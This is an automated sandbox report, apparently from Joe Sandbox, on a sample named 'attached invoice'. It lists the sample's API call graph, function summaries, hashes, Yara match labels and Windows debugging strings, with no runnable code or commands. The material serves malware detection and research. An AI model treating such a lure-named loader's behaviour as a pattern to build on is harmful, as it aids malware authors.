                                                                                                    execution_graph 87971 42c403 87972 42c41d 87971->87972 87975 1922d10 LdrInitializeThunk 87972->87975 87973 42c445 87975->87973 87976 4250c3 87977 4250df 87976->87977 87978 425107 87977->87978 87979 42511b 87977->87979 87980 42ce23 NtClose 87978->87980 87986 42ce23 87979->87986 87982 425110 87980->87982 87983 425124 87989 42f033 87983->87989 87985 42512f 87987 42ce3d 87986->87987 87988 42ce4e NtClose 87987->87988 87988->87983 87992 42d143 87989->87992 87991 42f050 87991->87985 87993 42d15d 87992->87993 87994 42d16e RtlAllocateHeap 87993->87994 87994->87991 87995 401b81 87996 401b86 87995->87996 87999 430483 87996->87999 87997 401c1a 87997->87997 88002 42ea93 87999->88002 88003 42eab7 88002->88003 88014 407613 88003->88014 88005 42eae0 88006 42eb3c 88005->88006 88017 41b793 88005->88017 88006->87997 88008 42eaff 88009 42eb14 88008->88009 88032 42d1e3 88008->88032 88028 428993 88009->88028 88012 42eb2e 88013 42d1e3 ExitProcess 88012->88013 88013->88006 88016 407620 88014->88016 88035 416af3 88014->88035 88016->88005 88018 41b7bf 88017->88018 88063 41b683 88018->88063 88021 41b804 88024 41b820 88021->88024 88026 42ce23 NtClose 88021->88026 88022 41b7ec 88023 41b7f7 88022->88023 88025 42ce23 NtClose 88022->88025 88023->88008 88024->88008 88025->88023 88027 41b816 88026->88027 88027->88008 88029 4289f4 88028->88029 88031 428a01 88029->88031 88074 418cb3 88029->88074 88031->88012 88033 42d200 88032->88033 88034 42d211 ExitProcess 88033->88034 88034->88009 88037 416b10 88035->88037 88036 416b29 88036->88016 88037->88036 88042 42d863 88037->88042 88039 416b84 88039->88036 88049 4296b3 NtClose LdrInitializeThunk 88039->88049 88041 416bd5 88041->88016 88044 42d87d 88042->88044 88043 42d8ac 88043->88039 88044->88043 88050 42c453 88044->88050 88049->88041 88051 42c46d 88050->88051 88057 1922b2a 88051->88057 88052 42c499 88054 42ef13 88052->88054 88060 42d193 88054->88060 88056 42d925 88056->88039 88058 1922b31 88057->88058 88059 1922b3f LdrInitializeThunk 88057->88059 88058->88052 88059->88052 88061 42d1b0 88060->88061 88062 42d1c1 RtlFreeHeap 88061->88062 88062->88056 88064 41b69d 88063->88064 88068 41b779 88063->88068 88069 42c4f3 88064->88069 88067 42ce23 NtClose 88067->88068 88068->88021 88068->88022 88070 42c50d 88069->88070 88073 19234e0 LdrInitializeThunk 88070->88073 88071 41b76d 88071->88067 88073->88071 88075 418cdd 88074->88075 88081 4191eb 88075->88081 88082 4142b3 88075->88082 88077 418e0a 88078 42ef13 RtlFreeHeap 88077->88078 88077->88081 88079 418e22 88078->88079 88080 42d1e3 ExitProcess 88079->88080 88079->88081 88080->88081 88081->88031 88086 4142d3 88082->88086 88084 41433c 88084->88077 88086->88084 88087 41baa3 88086->88087 88090 41bac8 88087->88090 88088 414332 88088->88077 88090->88088 88091 42ef13 RtlFreeHeap 88090->88091 88092 41b8e3 88090->88092 88091->88090 88093 41b8f4 88092->88093 88094 42c453 LdrInitializeThunk 88093->88094 88095 41b93b 88093->88095 88094->88095 88095->88090 88096 425453 88101 42546c 88096->88101 88097 4254f9 88098 4254b4 88099 42ef13 RtlFreeHeap 88098->88099 88100 4254c4 88099->88100 88101->88097 88101->88098 88102 4254f4 88101->88102 88103 42ef13 RtlFreeHeap 88102->88103 88103->88097 88104 42eed3 88107 42d053 88104->88107 88108 42d070 88107->88108 88111 1922eb0 LdrInitializeThunk 88108->88111 88109 42d09c 88111->88109 88151 42ffb3 88152 42ffc3 88151->88152 88153 42ffc9 88151->88153 88154 42eff3 RtlAllocateHeap 88153->88154 88155 42ffef 88154->88155 88112 1922a80 LdrInitializeThunk 88113 414653 88114 41466d 88113->88114 88116 41468b 88114->88116 88119 417e43 88114->88119 88117 4146d0 88116->88117 88118 4146bf PostThreadMessageW 88116->88118 88118->88117 88120 417e67 88119->88120 88121 417e6e 88120->88121 88122 417ea6 LdrLoadDll 88120->88122 88121->88116 88122->88121 88123 41ac13 88124 41ac85 88123->88124 88125 41ac2b 88123->88125 88125->88124 88127 41eb83 88125->88127 88128 41eba9 88127->88128 88132 41eca0 88128->88132 88133 4300e3 88128->88133 88130 41ec3e 88131 42c453 LdrInitializeThunk 88130->88131 88130->88132 88131->88132 88132->88124 88134 430053 88133->88134 88137 4300b0 88134->88137 88139 42eff3 88134->88139 88136 43008d 88138 42ef13 RtlFreeHeap 88136->88138 88137->88130 88138->88137 88140 42d143 RtlAllocateHeap 88139->88140 88141 42f00e 88140->88141 88141->88136 88156 415ff3 88157 416018 88156->88157 88158 417e43 LdrLoadDll 88157->88158 88159 41604e 88158->88159 88161 416076 88159->88161 88162 419bc3 88159->88162 88163 419bf6 88162->88163 88164 419c1a 88163->88164 88169 42c973 88163->88169 88164->88161 88166 419c3d 88166->88164 88167 42ce23 NtClose 88166->88167 88168 419cbd 88167->88168 88168->88161 88170 42c990 88169->88170 88173 1922bc0 LdrInitializeThunk 88170->88173 88171 42c9bc 88171->88166 88173->88171 88142 41415e 88143 4140ea 88142->88143 88146 42d0a3 88143->88146 88147 42d0c0 88146->88147 88150 1922b90 LdrInitializeThunk 88147->88150 88148 4140f5 88150->88148

                                                                                                    Executed Functions

                                                                                                    Function 00417E43 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 238 417e43-417e6c call 42faf3 241 417e72-417e80 call 4300f3 238->241 242 417e6e-417e71 238->242 245 417e90-417ea1 call 42e563 241->245 246 417e82-417e8d call 430393 241->246 251 417ea3-417eb7 LdrLoadDll 245->251 252 417eba-417ebd 245->252 246->245 251->252
                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                                    • Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
                                                                                                    • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                                    • Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795
                                                                                                    Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 281 42ce23-42ce5c call 404a23 call 42e053 NtClose
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                    • Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
                                                                                                    • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                    • Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4
                                                                                                    Function 01922B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 901f9eb4e5b9a27e0515ccd96ff0bc92ed6b8e05afe8c8809bba6d3996563677
                                                                                                    • Instruction ID: e808920460678ba218ebcf03cc941d2f60ef5faa0269b649ab35d13396ca26c0
                                                                                                    • Opcode Fuzzy Hash: 901f9eb4e5b9a27e0515ccd96ff0bc92ed6b8e05afe8c8809bba6d3996563677
                                                                                                    • Instruction Fuzzy Hash: 7590023120118802D5106158950474A405597D0301F55C915B4554658DC6A588917122
                                                                                                    Function 01922BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 4e1eb8bafcf347b7f5620b4dbd4064e57e40c29b02362c11bb82863afa0f6f5a
                                                                                                    • Instruction ID: 7fbbc2b93a133d745451a4bac968a86c2d5d3b9c750a142e36a110341c54fb7a
                                                                                                    • Opcode Fuzzy Hash: 4e1eb8bafcf347b7f5620b4dbd4064e57e40c29b02362c11bb82863afa0f6f5a
                                                                                                    • Instruction Fuzzy Hash: F390043130110403D50075DC750C7474055D7F0301F51D515F5154555FC775CCD17133
                                                                                                    Function 01922A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 5e9cc3bd2bd20b04cdc98bfbb4be400604bd7ac551970a8783cd2c8031e11aff
                                                                                                    • Instruction ID: 82411ab84fc1ba425e17af53dc2dc63cb2d5021b31f71505a71df75abc003faa
                                                                                                    • Opcode Fuzzy Hash: 5e9cc3bd2bd20b04cdc98bfbb4be400604bd7ac551970a8783cd2c8031e11aff
                                                                                                    • Instruction Fuzzy Hash: CE900471303100034505715C5514717C05FD7F0301F51C535F11445D0DC535CCD17137
                                                                                                    Function 01922D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: c76d6eb74a7a84ee03465ff56ff39115a538cbe1fdc7b6e0949a9737b5e35402
                                                                                                    • Instruction ID: 12e396676773124e41c19037c4051a00ae35633b59cac6041aa5bb3dfbef9d06
                                                                                                    • Opcode Fuzzy Hash: c76d6eb74a7a84ee03465ff56ff39115a538cbe1fdc7b6e0949a9737b5e35402
                                                                                                    • Instruction Fuzzy Hash: 1B90023120110413D51161585604707405997D0341F91C916B0554558DD6668952B122
                                                                                                    Function 01922EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 85f7795840a228eceb40ace3f77aecb229fd8d4a78b3ecbe7ad2b5f44bd2b642
                                                                                                    • Instruction ID: f2ae7e7957f06cf5307511ccb1d38b312443c93b4cc027a48840393cc0c8ef0c
                                                                                                    • Opcode Fuzzy Hash: 85f7795840a228eceb40ace3f77aecb229fd8d4a78b3ecbe7ad2b5f44bd2b642
                                                                                                    • Instruction Fuzzy Hash: F790043130150403D500715C5D1470F4055D7D0303F51C515F13D4555DC735CC517573
                                                                                                    Function 019234E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 81525ab0ebf1944b56c8c6db460e8eb7ca88017f592eb617114c473a8a3daf39
                                                                                                    • Instruction ID: 7db5876e65b88745271346a084cb33c1f5d22e04216093e1ff399948fc594381
                                                                                                    • Opcode Fuzzy Hash: 81525ab0ebf1944b56c8c6db460e8eb7ca88017f592eb617114c473a8a3daf39
                                                                                                    • Instruction Fuzzy Hash: 9790023160520402D50061585614706505597D0301F61C915B0554568DC7A5895175A3
                                                                                                    Function 004145AF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 23 4145af-4145c9 24 4145cc-414607 23->24 25 414667-4146bd call 417e43 call 404993 call 425593 24->25 26 414609 24->26 43 4146dd-4146e3 25->43 44 4146bf-4146ce PostThreadMessageW 25->44 27 41460a-41460b 26->27 29 414637 27->29 30 41460d-41461f 27->30 29->27 32 414638-41463a 29->32 30->24 39 414621-414628 30->39 36 414644 32->36 37 41463c-414643 32->37 37->36 41 414635-414636 39->41 42 41462a-414633 39->42 41->29 42->41 44->43 45 4146d0-4146da 44->45 45->43
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: t577G2K6$t577G2K6
                                                                                                    • API String ID: 1836367815-2667467881
                                                                                                    • Opcode ID: ceb7c13abfd14f9acb328a3e78e0a1effc0617a5ff02d39070758dc8d71a7bed
                                                                                                    • Instruction ID: 29e5b59ae817b40a0492b9d9877405cfbecd047df74ef541c8353dda1529c221
                                                                                                    • Opcode Fuzzy Hash: ceb7c13abfd14f9acb328a3e78e0a1effc0617a5ff02d39070758dc8d71a7bed
                                                                                                    • Instruction Fuzzy Hash: 7531C1729062947BCB01DB759C42CDEBBA8EE9339871840AEED449B201D13E8D438BD5
                                                                                                    Function 0041464A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 46 41464a-414685 call 42efb3 call 42f9c3 51 41468b-4146bd call 404993 call 425593 46->51 52 414686 call 417e43 46->52 57 4146dd-4146e3 51->57 58 4146bf-4146ce PostThreadMessageW 51->58 52->51 58->57 59 4146d0-4146da 58->59 59->57
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: t577G2K6$t577G2K6
                                                                                                    • API String ID: 1836367815-2667467881
                                                                                                    • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                                    • Instruction ID: 8fda3ae30d1e02e1b48dbe91bdc2a1754cabd6a2c39bac0a93a85bd1a5eab231
                                                                                                    • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                                    • Instruction Fuzzy Hash: DD1106B1D4021C7EDB119AE58C81DEFBB7CDF453A8F41407AFA54A7141E2784E068BA5
                                                                                                    Function 00414653 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 60 414653-414665 61 41466d-414685 call 42f9c3 60->61 62 414668 call 42efb3 60->62 65 41468b-4146bd call 404993 call 425593 61->65 66 414686 call 417e43 61->66 62->61 71 4146dd-4146e3 65->71 72 4146bf-4146ce PostThreadMessageW 65->72 66->65 72->71 73 4146d0-4146da 72->73 73->71
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: t577G2K6$t577G2K6
                                                                                                    • API String ID: 1836367815-2667467881
                                                                                                    • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                                    • Instruction ID: fd813871938eb91e280231b459abbd0e5037b6e28a91437a499ad31076d5f8c8
                                                                                                    • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                                    • Instruction Fuzzy Hash: 800104B1D0021C7ADB11AAE58C81DEFBB7CDF45398F408069FA44A7140E17C4E068BA5
                                                                                                    Function 00417F0B Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 254 417f0b-417f14 255 417ea6-417eb7 LdrLoadDll 254->255 256 417f16-417f1c 254->256 258 417eba-417ebd 255->258 257 417f1d 256->257 259 417f1e-417f2a 257->259 260 417f2c 259->260 261 417eec-417f00 260->261 262 417f2e-417f37 260->262 261->260 264 417f02-417f06 261->264 262->257 263 417f39-417f42 262->263 265 417f45-417fa1 263->265 266 417ecf-417ede 263->266 264->259 267 417f08 264->267 269 417ee0-417ee2 266->269 270 417eeb 266->270 267->257 270->261
                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                                    • Instruction ID: cee6ba3a713131cb16669297f14733702e208aa7074b7cb970d80753226a90f1
                                                                                                    • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                                    • Instruction Fuzzy Hash: 7AF02D32E88209CFDB00DF98DC45BD9B3B0FB56719F140ADAEA188B241D36555968B49
                                                                                                    Function 0042D143 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 271 42d143-42d184 call 404a23 call 42e053 RtlAllocateHeap
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                                    • Instruction ID: 1a0320424f6e2513cda363ed32119c93a96c745f6f302d4d30482123bd46745d
                                                                                                    • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                                    • Instruction Fuzzy Hash: F0E06D723042187BC614EE59DC41FDB73ACEFC9710F004419F908A7241CA75BA118BF8
                                                                                                    Function 0042D193 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 276 42d193-42d1d7 call 404a23 call 42e053 RtlFreeHeap
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3298025750-0
                                                                                                    • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                                    • Instruction ID: e28c5f6046658d42be081c83e7545d2ad134910e97977f916db6725ae22c6c78
                                                                                                    • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                                    • Instruction Fuzzy Hash: 19E092723002147BCA10EE5AEC41FEB73ACEFC9710F004019FD08A7241CA78B9118BB8
                                                                                                    Function 0042D1E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 286 42d1e3-42d21f call 404a23 call 42e053 ExitProcess
                                                                                                    APIs
                                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_attached invoice.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 621844428-0
                                                                                                    • Opcode ID: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                                                                    • Instruction ID: fa5f5a3ee7dd61a2881b8e9e18f2c3305c63e6423d1f29c247da1a030937b839
                                                                                                    • Opcode Fuzzy Hash: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                                                                    • Instruction Fuzzy Hash: 5FE04F762402147BC510EB5ADC01F97775CEFC5755F508419FA0967142CB75BA11C7B4
                                                                                                    Function 01922B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 291 1922b2a-1922b2f 292 1922b31-1922b38 291->292 293 1922b3f-1922b46 LdrInitializeThunk 291->293
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 5395353d39fb4ffc4a1c47e0126027f779865f0449c43051f77b6a5972b0c711
                                                                                                    • Instruction ID: 6897e3aca5b4f0090d7b347cf037963529330cedb7dc0aaa89901b5e457a8a8a
                                                                                                    • Opcode Fuzzy Hash: 5395353d39fb4ffc4a1c47e0126027f779865f0449c43051f77b6a5972b0c711
                                                                                                    • Instruction Fuzzy Hash: 31B092729025D5CAEA12EB645B0CB1BBA54BBD1702F26C566E25A0681F8B38C091F276

                                                                                                    Non-executed Functions

                                                                                                    Function 01998890 Relevance: 37.8, Strings: 30, Instructions: 268COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 019989BF
                                                                                                    • *** then kb to get the faulting stack, xrefs: 01998B4C
                                                                                                    • *** enter .exr %p for the exception record, xrefs: 01998B21
                                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01998944
                                                                                                    • The instruction at %p referenced memory at %p., xrefs: 01998A62
                                                                                                    • <unknown>, xrefs: 019988AE, 01998901, 01998980, 019989C9, 01998A47, 01998ABE
                                                                                                    • This failed because of error %Ix., xrefs: 01998A76
                                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01998B6F
                                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01998A06
                                                                                                    • Go determine why that thread has not released the critical section., xrefs: 019989F5
                                                                                                    • The critical section is owned by thread %p., xrefs: 019989E9
                                                                                                    • a NULL pointer, xrefs: 01998B10
                                                                                                    • read from, xrefs: 01998ADD, 01998AE2
                                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 019989CB
                                                                                                    • an invalid address, %p, xrefs: 01998AFF
                                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 01998982
                                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01998AB4
                                                                                                    • The resource is owned exclusively by thread %p, xrefs: 019989A4
                                                                                                    • write to, xrefs: 01998AD6
                                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01998AAD
                                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01998953
                                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01998AA6
                                                                                                    • The resource is owned shared by %d threads, xrefs: 019989AE
                                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01998923
                                                                                                    • *** enter .cxr %p for the context, xrefs: 01998B3D
                                                                                                    • The instruction at %p tried to %s , xrefs: 01998AE6
                                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0199890C
                                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 01998ABF
                                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01998935
                                                                                                    • *** Inpage error in %ws:%s, xrefs: 01998A48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
